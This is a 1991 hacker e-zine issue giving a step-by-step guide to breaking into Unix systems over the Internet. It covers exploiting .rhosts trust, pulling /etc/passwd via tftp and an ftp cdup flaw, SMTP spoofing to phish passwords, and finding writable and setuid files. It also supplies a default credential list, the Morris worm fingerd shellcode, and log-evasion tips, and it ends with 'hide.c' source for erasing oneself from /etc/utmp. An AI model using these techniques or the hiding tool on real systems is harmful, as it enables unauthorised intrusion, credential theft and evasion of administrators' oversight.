==============================================================================
Volume 2, Issue 01 ---------------------------------- Thursday August 29, 1991
==============================================================================
  Legions of Lucifer - Phone Hackers United to Crash & Kill  < LoL-Phuck >
               LoL-Phuck, Inc. /  Issue Number 2.01  08.29.1991
           (C)Copr 1990,91 Cypher Productions - All rights reserved.
==============================================================================
     Legions of Lucifer founded on January 20, 1990 by: Digitone Cypher
     PHUCK, INC. Founded in 1986 by: Tripin Face  (aka Cobra Commander)
------------------------------------------------------------------------------
Legions of Lucifer merged with PHUCK, INC on January 15, 1991 at 11:41pm PST!
(That is the same day the Persian Gulf War started [Operation Desert Storm])
We are now: LoL-Phuck
------------------------------------------------------------------------------
Note:    Any and all information found in this production is not to be used or
intended to  be released to  due any harm to anyone.   This is mearly for 100%
informational purposes only and neither writers, staff members, submitters nor
anyone else that  has anything  to do with this released  issue should be held
resonsible for  the deeds and misgivings that intentional may readers preform.
------------------------------------------------------------------------------
                   All text file submissions should go to:
               West Coast Technologies, Inc. @ +1-213-274-1333
          (Use the guest account; User Name: GUEST  Password: GUEST)
------------------------------------------------------------------------------
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
------------------------------------------------------------------------------
EDITORS/PRESIDENTS NOTE:
 Okay basically, I am proud to say that LoL-Phuck is back from the "DEAD"
 to bring you finally good quality reading material. I am going to tell
 you guys right now, that we will not be producing that many text files,
 we will just release when we feel like it, and not on a monthly kind
 of basis. We are infact looking for writers, so if you do want to apply,
 you can find it in this text file where to. This certain file, is a joint
 release between SHA (a Swedish Hacking Group) and LoL-Phuck, so I hope
 you all like it... I would also, like to note that starting from this
 text file, LoL-Phuck will be totally different, this is the NEW and very
 IMPROVED Legions of Lucifer-Phuck. Watch for the hot text files and
 releases we will be producing in the months to come..

 Starting on November 2, 1991 "West Coast Technologies, Inc" will be changing
 area codes from 213 to 310. There will be a 6-Month period from November 2,
 1991 to May 2, 1992, when both the new and the old ways of completing the
 calls to this number (274-1333) will work. Beginning May 2, 1992, calls
 dialed to the incorrect area code (213) will not be completed. You will
 reach a recording explaining the new dialing procedures and you will need to
 re-dial using the correct area code (310).

 ...Also, as you all know by now, there is a text file called "LOL-21.TXT"
 which was supposedly written by me, that is like a "Sexual Biography", I
 am going to state for the record that I *DID NOT* write that trash. Now,
 The next official issue will be "LOL-022.TXT" since #21 has been taken by
 the bogus text file, and we wouldn't want them to get confused now would
 we? This kinda of thing has happened before, I believe it was Issue #9,
 some jokers did the same prank, so I know how to handle it. Anyways, I
 would like to thank the rest of you for all your support.

                                   Digitone Cypher
                                 LoL-Phuck President
                                      08-29-91

 I may be contacted at the following internet addresses:

 UUCP: {hplabs!hp-sdd ucsd nosc}!crash!pnet01!dcypher
 ARPA: [email protected]
 INET: [email protected]


##############################################################################
----------------------[ Hacking UNIX Through Internet! ]----------------------
##############################################################################
Written by: Mr Big <SHA>               Release Date: Thursday August 29, 1991
Editied by: Digitone Cypher            Release Numb: 20th Issue
------------------------------------------------------------------------------



 This file is released in a joint venture with Swedish Hackers Association
 in Sweden.

 Note: S.H.A. are not members of LoL-Phuck, nor are LoL-Phuck members
       of S.H.A., both groups are separate to each other, this is a only
       a exchange in knowledge and assistance.

 Legions of Lucifer-Phuck is always looking for submissions of text files
 from small groups and from solo writers for worldwide distribution.
 We are also look for Distribution Sites and full/half-time writers. I
 can be contacted at the LoL-Phuck HQ @ 213/274+1333... thank you.



                              ----------------
                              - Introduction -
                              ----------------

 I decided to write this file since I feel that there are no complete
 files about hacking unix systems. Many files only cover some small part
 in the art of hacking unix, and they don't cover hacking through
 Internet where aprox. 80% of all hacking takes place. I will not state
 that this file isn't complete either, since I have, on purpose, left out
 many things, i.e. bugs in programs that might be exploited, as the Internet
 Worm did. The reason I did this is because they will not be up-to-date for
 very long, even though some sites don't install all patches that are
 released. A good source for all these bugs are comp.unix.wizard,
 comp.unix.source and other newsgroups.

 This file isn't supposed to be for the beginner, so not everything in this
 file is explained in detail. YOU should have common knowledge of unix and
 Internet.


 /Mr Big - S.H.A.


---------------------------[ Internet Section ]-----------------------------


                                ------------
                                - Internet -
                                ------------

 In the beginning a US Goverment network existed nationwide. When it
 grew larger the network where split into two networks, one research-
 (Arpanet) and one millitary network (Milnet). Later thousands of other
 networks worldwide where also connected and then Internet was born.

 Internet is a good way of hacking unix systems. There are more than
 ten thousand computer systems connected to Internet worldwide, running
 diffrent OS's, but Unix's are the major one used. You are also able to reach
 other networks or domains through Internet as ARPA network, NASA or the NSA
 network among others since they are part of the Internet.

 Approxitly 80% of all hacking take part on Internet. So be aware of
 that goverment agencies are watching known hacking sites and other sources
 for hackers.

 There are also many outdials connected to Internet worldwide that can
 be used for free calls, but this file isn't about that. Maybe I will compile
 my list of outdials some day and release it, but that is in the future.

 How do I get connected to Internet? Well, find you local dialup or go
 through some University, since most of them are connected to Internet.

 You can use the MIT Dialup if you don't have anything else:

           MIT LCS Network Dialup                  (617) 258-7111

 (I'm sorry that I can't supply you with a whole list of dialups, but
  since I'm from Sweden, I don't have the needs for US Dialups.)


 WARNING: Even if Internet seems to be untraceable, they can easily find
          out where you are hacking from. It's a bit harder if you
          use gateways before hacking, and don't use your own account
          unless you want to be in deep shit!



                                  -------
                                  - IRC -
                                  -------

 Internet Relay Chat or IRC for short, is a worldwide multi-chat system
 where users can exchange and discuss stuff real-time with the rest of the
 world. IRC has many channels you can use - both public, private and hidden.
 There are many users using this and you can easily get help and information
 this way, since many people out there knows what they are doing.

 Be aware that goverment agencies, like NCSA, might be tapping the public
 forums and users using them, atleast I would...

 Use this IRC server if you don't have anything else:

              bradenville.andrew.cmu.edu             (128.2.54.2)



                                ------------
                                - Outdials -
                                ------------

 There are also outdials on Internet that you can use. I will not include
 a list of those, since I know if they are abused, they will go down. You
 have to do your own search for them.



                                 ----------
                                 - Telnet -
                                 ----------

 Telnet is more or less equal to Internet. With Telnet you can access other
 systems on the Internet by entering the IP number or the same address of
 the computer.

 This is the most common way of connecting to other systems, even if there
 are other ways too... i.e. rlogin among others...

 #telnet [HOST] [PORT]

 Where HOST is the IP address or the name of the computer, and PORT is the
 port to connect to at the remote site.

 The port number range from 0-9999. Ports 0-255 are standard ports and well
 defined in unix. Ports 256-1023 are well known ports. Ports 1024-4999 are
 user defined ports. Ports from 5000 and upward are nondefined ports.

 Here are a small list of common port numbers and what they do:

 21   FTP           _ File Transfer Protocoll
 25   SMTP          - Or Simple Mail Transfer Protocol.
 79   Finger        - Reports information of users on remote system.



                                  -------
                                  - Ftp -
                                  -------

 File Transfer Protocol or FTP for short is a powerful way to send and
 receive files between Internet connected hosts.

 Many sites have set up their systems for anonymous ftp. They have done
 this since they want everyone to be able to get files and information
 without having a password. You should respect the ftp hours that are
 common, i.e. do NOT ftp at local business times, since these systems
 are used in companys, and work most of the time, and if you use ftp during
 these hours, they might close the opportunity for us to use ftp, and I
 would hate it if that happend.

 #ftp [HOST]

 Where HOST are the IP address or the name of the computer.



                                 ----------
                                 - Usenet -
                                 ----------

 Some people say that Usenet is the world larges BBS around, and in some
 sense they are right. Usenet consists of over 1000 forums for various
 topics, with hundreds of thosands of users worldwide using it.

 Many good forums for Unix information exists, i.e.

 misc.security
 comp.unix.vizard
 comp.unix.source
 comp.security.announce
 alt.security

 To use Usenet news just type:

 #rn                                 <- This command might vary from
                                        system to system.



                                  --------
                                  - CERT -
                                  --------

 CERT or Computer Emergency Respons Team is an organization which main
 purpose are to help and prevent unautorized access to computer systems.
 They publish bug fixes for security holes in diffrent OS's, mainly in
 comp.security.announce. They also have their own site and support for
 anonymous ftp so you can directly ftp bug fixes from them or tools that
 helps system administrators to check the security on their own systems.

 One good system administration tool for checking the security on your own
 system are COPS, even if it dosen't detect all bugs that exists.

 System Managers: If you think you have a compromised system, I suggest that
                  you contact CERT for assistance.

 The Internet address for CERT is:

              cert.sei.cmu.edu                    (128.237.253.5)



------------------------------[ Unix Section ]-------------------------------


                             --------------------
                             - Attacking target -
                             --------------------

 Well... first we need an account on a remote system.. How do we get it?
 There are no easy ways for this, unless your system is trusted.

 It isn't easy even if your system is trusted, but it is easier :-)


                                 - .rhosts -

 Check out your own and other users .rhosts files.
 These files contains those machines and users that are trusted to log into
 the account, in which home group it resist, without any password.

 Note: You must use rlogin to use this feature.

 #cat .rhosts
 albert guest
 gnu.ai.mit.edu +
 #

 The plus (+) sign indicates that all users on gnu.ai.mit.edu are trusted to
 use this account without a password, and hopefully this user can log in on
 the same account on gnu.ai.mit.edu whithout a password.

 Note: You can set "+ +" to allow anyone anywhere to use the account,
       but be aware of that if the user dosen't have to enter his own
       password, he WILL contact the system administrators at his site.


 To scan all users .rhosts files use the following:

 #find / -name .rhosts -exec /bin/cat {} ";"

 If you stumble in on an account, then I suggest you add one entry to
 the .rhosts file to include the hostaddress of a system that allows guest
 users, and a plus sign (+). By doing this you don't have to create a shell
 with suid that can be discovered and you don't even have to hack another
 account to use the one you stumbled on.

 Remeber that the user or root must own the .rhosts file on many newer
 systems, i.e. Sun OS 4.x.



                            - /etc/hosts.equiv -

  /etc/hosts.equiv contains system wide trusted remote sites.

  #cat /etc/hosts.equiv
  albert
  [email protected]
  +
  #

  If /etc/hosts.equiv contains a plus sign (+) then all hosts are trusted.
  Many Sun system are deliverd with /etc/hosts.equiv set up this way.


                                 - finger -

 You can also always try to get some accounts on a remote site by using
 "finger @remotesite" and then guessing passwords...

 You can even try "finger user@remotesite", where user is a possible user
 on the remote site, i.e. guest to see if they have a guest account.


                                 - tftp -

 Some systems running tftp - Trivial FTP, have a bug allowing you
 to copy files that contain slashes, normaly tftp impose the security
 that the file must be world readable, but since /etc/passwd are
 world readable, try this:

 #tftp remotesite
 tftp> get /etc/passwd                         <- Try snatching /etc/passwd
 Recieved 30216 bytes in 32 seconds.
 tftp> quit
 #

 Note: Even if you are not physicaly are logged in at the remote host,
       this action is stored in the log files on the remote system.


                                  - ftp -

 Some systems running anonymous ftp and are not correctly setup might
 allow any user to move above their restricted (root) directory, and
 then access all files on the system.

 #ftp remotesite
 Connected to remotesite.
 220 remotesite FTP server (Version 5.59 Mon Oct 29 15:33:08 EET 1990) ready.
 Name (remotesite:root): anonymous                <- Login as anonymous
 331 Guest login ok, send your login name as password.
 Password:                                        <- Anything is ok
 230- Guest login ok, access restrictions apply.
 ftp> cdup                                        <- The magic one!
 250 CWD command successful.
 ftp> get /etc/passwd /dev/tty                    <- Retreive /etc/passwd
 200 PORT command successful.
 150 Opening ASCII mode data connection for passwd (56 bytes).
 root:sEQ5aTPgP4bSc:0:0:Super-User:/:/bin/sh
 +::0:0:::
 226 Transfer complete.
 local: /dev/tty remote: passwd
 56 bytes received in 7e-06 seconds (1.1e+04 Kbytes/s)
 ftp> quit
 221 Goodbye.
 #


                                - sendmail -

 The Internet Worm exploited a debug mode in the original sendmail to
 coax sendmail into creating and executing a program that copied the
 rest of the Internet worm over to the target host.

 Note: Almost every system have been patched against this.

 #telnet remotesite 25
 Escape character is '^]'.
 220 s350.  Sendmail 4-0/SMI-4-0 ready at Wed, 10 Jan 91 15:35:01
 debug                                          <- Try debug command
 200 Debug set
 quit
 Connection closed by foreign host
 #


                                  - smtp -

 By connection to the smtp daemon on the remote site, you are able to send
 mail under any user identity, to any user on any system.

 If we want to try to fool a user on a system to change his password,
 (not likely he will be fooled), but we can easily do this,
 i.e. We want to send mail from [email protected] to [email protected]

 #telnet tycho.ncsc.mil 25
 Connected to tycho.ncsc.mil.
 Escape character is '^]'.
 220 tycho.ncsc.mil.  Sendmail 4-0/SMI-4-0 ready at Wed, 10 Jan 91 15:35:01
 rcpt to: [email protected]                <- Receiving user
 250 john... Recipient ok
 mail from: [email protected]           <- Fake user
 250 example... Sender ok
 data                                     <- Instruct SMTP to receive data
 354 Enter mail, end with "." on a line by itself

 We are testing new equipment and you are instructed to change your password
 to john as soon as you receive this message.

 [email protected]
 .                                        <- End mail
 250 Mail accepted
 quit                                     <- Now disconnect from system
 Connection closed.
 #



                             -------------------
                             - Raise you privs -
                             -------------------

 Many users talk about getting root access... It's nice but not necessary
 to have. The Internet worm didn't exploit root privs if it had it and
 it managed to hit many remote sites anyway.

 If you need root or not depends on what you want to do with the system.


                               - System files -

 Check out if you have read/write access to the following files:

 #ls -l /dev/mem
 crwxrw-rw-  root  /dev/mem            <- General physical memory

 #strings - /dev/mem                   <- Use this to get strings
                                          from memory to use


 #ls -l /dev/kmem
 crwxrw-rw-  root  /dev/kmem           <- Kernal memory

 Kernal memory contains among other things.. psid table - Process ID table.
 I will not support any C program allowing changes to pid's in kernal memory
 since if someone doesn't know how to use it, then the whole system will
 crash! and we don't support that kind of action.


 #ls -l /etc/inittab                   <- Sys V startup file
 #ls -l /etc/rc*                       <- BSD startup file
 -rw-rw-rw-  root  /etc/inittab
 -rw-rw-rw-  root  /etc/rc             <- Standard unix commands
 -rw-rw-rw-  root  /etc/rc.host        <- running with root privs
 -rw-rw-rw-  root  /etc/rc.local       <- #ex /etc/rc


 #ls -l /etc/inetd.conf                <- Sys V demon configuration file
 #ls -l /usr/etc/inetd.conf            <- BSD demon configuration file
 -rw-rw-rw-  root  /etc/inetd.conf     <- After editing use #kill -1 initd
 -rw-rw-rw-  root  /usr/etc/inetd.conf <- After editing use #kill -1 initd


 #ls -l /etc/utmp                      <- Contains only who information
 -rw-rw-rw-  root  /etc/utmp           <- Used to hide your session
                                          or to change your usernamne
                                          Check out the included source
                                          (hide.c) that does this.
                                          You can even read other users mail.


 #ls -l /usr/spool/cron/crontabs       <- Sys V cron shell scripts
 #ls -l /usr/spool/cron                <- Older unix systems
 -rw-rw-rw-  root   /usr/spool/cron/crontabs
 -rw-rw-rw-  root   /etc/spool/cron

 Check also local written system scripts that runs as root and other
 important system files.


                            - System directorys -

 Check to see if you have write privs to any important system directory.
 i.e.
   /etc
   /bin
   /usr/etc
   /usr/bin
   /usr/lib
   ...

 To find writeable directories use:
 #find / -type d -perm -2 -print

 If you have write priv's to a directory but not to a file in the directory
 you can still copy the file over to another directory, modify it and
 copy it back.

 #cp /home/admin/.rhosts /home/mydir/newrhosts
 #ex /home/mydir/newrhosts
 #rm /home/admin/.rhosts
 #mv /home/mydir/newrhosts /home/admin/.rhosts

 or

 #cat /bin/sh > /home/admin/shell

 To find writeable files use:
 #find / -type f -perm -2 -file {} ";"

 Try modifying startup files for users,
 i.e.
   .login
   .cshrc
   .profile
   ...

 Note: The System Administrators might check to see if these files have
       been changed and then they check them to see if there was a backdoor
       installed or not.


                                - UID files -

 I neat way of gaining better access is to search for files that
 have the UID bit set and then if they are writeable, copy /bin/sh over
 to the file to gain the privileges of the owner of the file.

 #find / -perm -4000 -exec /bin/ls -lad {} ";"


                                  - mbox -

 Reading other peoples mailboxs might give you a clue to their password.
 They might even have posted it to a friend on the system.

 Note: Reading other peoples electronic mail is a serious crime.

 #find / -name mbox -exec /bin/cat {} ";"


                                - fingerd -

 The Internet worm exploitet a bug in the old fingerd program. The program
 used an obsolete C function called gets(). gets() copies input into
 a string, but doesn't count the number of characters copied. The old
 fingerd declaired a 512-byte buffer as an automatic variable, which placed
 this buffer on the stack. The Internet worm sent down 536 characters,
 overflowing the buffer, adding some code, and modified the return address,
 so that fingerd executed a Bourne shell instead of returning. This flaw
 was used only for VAX running BSD unix.

 VAX assembly-language code used:

 nop                          400 nop's
 ...
 pushl $68732f                store '/sh[null]' on stack
 pushl $6e69622f              store '/bin' on stack
 movl  sp,r10                 save stack pointer in r10
 pushl $0                     store 0 on stack (arg 3)
 pushl $0                     store 0 on stack (arg 2)
 pushl r10                    store string adress on stack (arg 1)
 pushl $3                     store argument count on stack
 movl  sp,ap                  set argument pointer to stack
 chmk  $3b                    system call to execve



                           -----------------------
                           - Brute force hacking -
                           ------------------------

 You can allways get a copy of /etc/passwd and then run it with a
 unix matcher guessing passwords. There are many programs around,
 so I think I'm wasting my time if I include one. This is the standard way
 of getting other accounts.. but it's hard to match root account password.
 If you wan't root access you have to use some other technique,
 but if you are satisfied with some user accounts, this is the best way.

 Be adviced that many new systems have passwords from 6-8 characters with
 a minimum of one non-alphabetical character, or they are running C2
 standard with shadow /etc/passwd, i.e. you can only see account names
 in /etc/passwd and not the encrypted password, i.e.

 #cat /etc/passwd                                 <- Featuring C2 standard

 root:*:0:0:Super-User:/:/bin/sh                  <- You can see that they
 guest:*:3169:30:Guest User:/home/guest:/bin/rsh  <- Have shadowing passwd
 +::0:0:::                                           file since the password
                                                     field contains '*'.


 You can always try to get accounts without password:

 #grep :: /etc/passwd

 Note: Many system administrators will have their eyes open for users who
       use A LOT of cpu time... so I suggest that you get yourself a password
       cracker for your own computer at home, and run your matching sessions
       there, even if it's slower.



                                 ----------
                                 - Hiding -
                                 ----------

 Since hacking is illegal you might want to hide from the System Manager
 at the site you are attacking. Please note that they often pay special
 attention to users using a big per cent of the cpu time (like when matching
 passwords). Also try to keep the number of files in your directory low,
 or atleast try to only store smaller files, anything to not draw
 attention to you.

 Change users frequently so if the system managers notice you they hopefully
 do not get any evidence against you.

 Check system files to see if they have been patch audit your access to them.



                                - /etc/utmp -

 If you have write permissions to /etc/utmp you can easily remove
 yourself to show up on "who" listings, or even change your username.

 Check out the included C source for this, Hide.c.

 You can also read other users mail if you can alter /etc/utmp.


                                  - getty -

 Try running /etc/getty or /usr/etc/getty and login again.

 With this way you will hide from where you are calling from, i.e. your host
 address won't show up on "who" listnings.


                             - running programs -

 If you use any program that you shouldn't i.e. running passsword
 matching programs, then I suggest that you first rename the program to some
 appropiate, i.e.

 #mv matcher emacs
 #mv passwd user
 #mv password magazine

 Then use the program:

 #emacs user magazine

 Or you simply change your source code to always use one file as the passwd
 file and another one for the dictionary.


                             - /usr/spool/mail/ -

 There are times when you should edit users mail. If you are editing a file
 and then kill the process, it will post mail to your user stating that
 the process was aborted and that you can recover your file with a command.
 If the real user sees this, he might talk to the system administrators
 about it, and then they will start to investigate the account without
 your knowledge, and some day.... shit happends!


                                - /etc/wtmp -

 If you have root access you might want to remove your trails from the
 system log file, /etc/wtmp, so they won't notice that you are fooling
 around with their system.



                                 ----------
                                 - Modems -
                                 ----------

 Many people hack just to lower their phonebills. Many unix systems has
 outgoing modem lines. You can use them if you have the right privileges.

 Try using the command cu - Call Unix:

 #cu 3143818460                                <- Yeah! This number works...



                            ---------------------
                            - Standard accounts -
                            ---------------------

 There are many standard accounts you can try hacking and some common too.
 Even if the system administrators are more aware of these holes, they still
 exists, and may be worth trying. Use the included list of standard and
 successful accounts.

 Login:          Password:                  Login:          Password:

 adm             adm                        admin           admin
 altos           altos                      batch           batch
 bin             bin                        daemon          daemon
 date            date                       demo            demo
 field           service                    games           games
 general         general                    guest           guest
 help            help                       ingres          ingres
 learn           learn                      lp              lp
 lpadmin         lpadmin                    nuucp           nuucp
 pub             pub                        public          public
 rje             rje                        root            root
 standard        standard                   student         student
 sync            sync                       sys             sys
 sysadm          sysadm                     test            test
 time            time                       tty             tty
 unix            unix                       user            user
 uucp            uucp                       uuhost          uuhost
 who             who



                             -------------------
                             - Finding targets -
                             -------------------

 This is the hard part if you don't know so much about Internet.
 I will not go further into this, because if everyone starts to use
 the techniques I have, it will be abused and then we might not have many
 systems that will be reachable through Internet. And we don't want
 that to happen, so you have to figure this out for yourself. If this
 sounds a bit on the selfish side, I truely regret it, but its for your
 own good.



                            ---------------------
                            - Crashing a system -
                            ---------------------

 If you do crash a system on purpose, I hope you get caught and that
 you have to rot in prison for a long long time...

 Even if you stumble in on a root account and think that they are
 lamers who are in charge of the system, you NEVER trash the system
 on purpose!

 Never crash a system on purpose!
 Never delete files that you haven't created!
 Never remove personal mail to people on the system!



                           -----------------------
                           - Voice of the Author -
                           -----------------------

 I have been working with this for some time now. Even if I don't really
 feel that this is complete, I have desided to release it as it is,
 (then I can write a follow up to this... <grin>), and hopefully you
 will enjoy it anyway.

 I will release some Internet/Unix hacking utilities in the near future,
 including backdoors and other nice programs you might need.

 If you need to contact me or S.H.A. you can send mail to me on the
 following networks:

 FidoNet  : 2:201/610 username mrbig
 Internet : [email protected]


#############################################################################
SOURCE CODE     SOURCE CODE     SOURCE CODE     SOURCE CODE     SOURCE CODE
#############################################################################

                                  --------
                                  - Hide -
                                  --------


 Speacial thanx to Nimh of Stealth Hackers who wrote this program and for
 letting me include it in this release. Thanx!

 Hide will let you remove yourself from /etc/utmp or change the information
 for you in /etc/utmp, i.e. username, host address or tty.

 Note: /etc/utmp must be writeable by world.

<----CUT HERE-------CUT HERE-------CUT HERE-------CUT HERE------CUT HERE---->


#include <stdio.h>
#include <stdlib.h>
#include <utmp.h>
#include <pwd.h>

#define UTMPFILE        "/etc/utmp"

       FILE    *utmpfile;
       char    *utmp_tmp[10240];

main (argc, argv)
       int     argc;
       char    *argv[];
{

       struct  utmp    *user_slot;
       struct  passwd  *pwd;
       char    line[10], name[10], host[20];
       int     index;

       printf ("Welcome to HIDE !        FORMAT:  hide [-i]\n\n");
       utmpfile = fopen (UTMPFILE, "r+");
       if (utmpfile == NULL)
       {
               printf ("ERROR while opening utmp file... exiting...\n");
               exit ();
       }
       index = ttyslot();                                              /* Get this users utmp index */
       index *= sizeof(struct utmp);   /* 36 */
       fseek(utmpfile, index, 0);
/****  Get real UID  ****/
       pwd = getpwuid (getuid());
       if (pwd == NULL)
               printf ("Who the hell are you???");
       else
       {
       printf ("Real user identity:\n");
       printf ("NAME  %s\n", pwd->pw_name);
       printf (" UID  %d\n", pwd->pw_uid);
       printf (" GID  %d\n\n", pwd->pw_gid);
       }
/****  If ARG1 = "-i" then disappear from utmp  ****/
       if ( (argc>1) && (!strcmp(argv[1], "-i")) )
       {
       index+=8;       /* Rel PNT name */
       fseek(utmpfile, index, 0);
       fwrite ("\000", 8, 1, utmpfile);        /* NO NAME */
       fwrite ("\000", 8, 1, utmpfile);        /* NO HOST */
       fclose(utmpfile);
       printf ("Removed from utmp\n");
       exit();
       }
/****  Change utmp data  ****/
       printf ("Enter new data or return for default:\n");
       fseek(utmpfile, index, 0);      /* Reset file PNT */
       fread(line, 8, 1, utmpfile);    line[8]=NULL;
       fread(name, 8, 1, utmpfile);    name[8]=NULL;
       fread(host, 16, 1, utmpfile);   host[16]=NULL;
       fseek(utmpfile, index, 0);      /* Reset file PNT */
       dinput (" TTY  [%s]%s", line, 8);
       dinput ("NAME  [%s]%s", name, 8);
       dinput ("HOST  [%s]%s", host, 16);
       fclose(utmpfile);
}

/* Data input */
dinput (prompt, string, size)
       char    *prompt;
       char    *string;
       int     size;
{
       char    input[80];
       char    *stat;
       char    space[] = "                              ";

       space[20-strlen(string)] = '\000';
       printf (prompt, string, space);
       stat = gets (input);
       if (strlen(input) > 0)
               fwrite (input, size, 1, utmpfile);
       else
               fseek (utmpfile, size, 1);
}

<----CUT HERE-------CUT HERE-------CUT HERE-------CUT HERE------CUT HERE---->


==============================================================================
##############################################################################
   ##      #######  ##            ######  ##   ##  ##   ##  ######   ##  ##
  ##      ##   ##  ##     ####   ##  ##  #######  ##   ##  ##       ## ##
 ##      ##   ##  ##            ######  ##   ##  ##   ##  ##       #####
######  #######  #######       ##      ##   ##  #######  #######  ##   ##
##############################################################################
------------------------------------------------------------------------------
    (L)egions (o) (L)ucifer - (P)hone (H)ackers (U)nited (C)rash (K)ill
------------------------------------------------------------------------------
Call these LoL-Phuck support boards for information or application
inquiries:

UNITED STATES:
The Disconnected System        602/997+9918  Arizona         NSA Dist Site
West Coast Technologies, Inc.  213/274+1333  California      AfterShock Beta
The Magical Mystery Board      203/TMP+DOWN  Connecticut     THG Dist Site
Blitzkrieg BBS <Node 1>        502/499+8933  Kentucky        TAP Magazine HQ
Blitzkrieg BBS <Node 2>        502/491+5198  Kentucky        TAP Magazine HQ
Free Speech BBS                618/457+3365  Illinois        PHRACK Classic HQ
Gonzo's Gabanza                513/890+0655  Ohio            CHUD Dite Site

EUROPE/OUTSIDE CONTINENTAL NORTH AMERICA:
Interpol II                  +46-8-PR-IVAT  Sweden           SHA HQ
==============================================================================
Legions of Lucifer-Phuck High Office Staff Member

Prezident of [L.o.L]       : Digitone Cypher
Prezident of [Phuck]       : Tripin Face (aka Cobra Commander)
Out of US Representatives  : Mr Big          -=-  Sweden

==============================================================================
   Legions of Lucifer - Phone Hackers United to Crash & Kill  < LoL-Phuck >
           LoL-Phuck, Inc. / Issue Number 2.01  08.29.1991 Complete
          (C)Copr 1990,91 Cypher Productions - All rights reserved.
------------------------------------------------------------------------------
                    All text file submissions should go to:
                West Coast Technologies, Inc. @ +1-213-274-1333
          (Use the guest account; User Name: GUEST  Password: GUEST)
------------------------------------------------------------------------------
______________________________________________________________________________
==============================================================================
==============================================================================
             - Digitone Cypher (Main Editor/Layout/President)
==============================================================================
456835454/021491-0202

Downloaded From P-80 International Information Systems 304-744-2253 12yrs+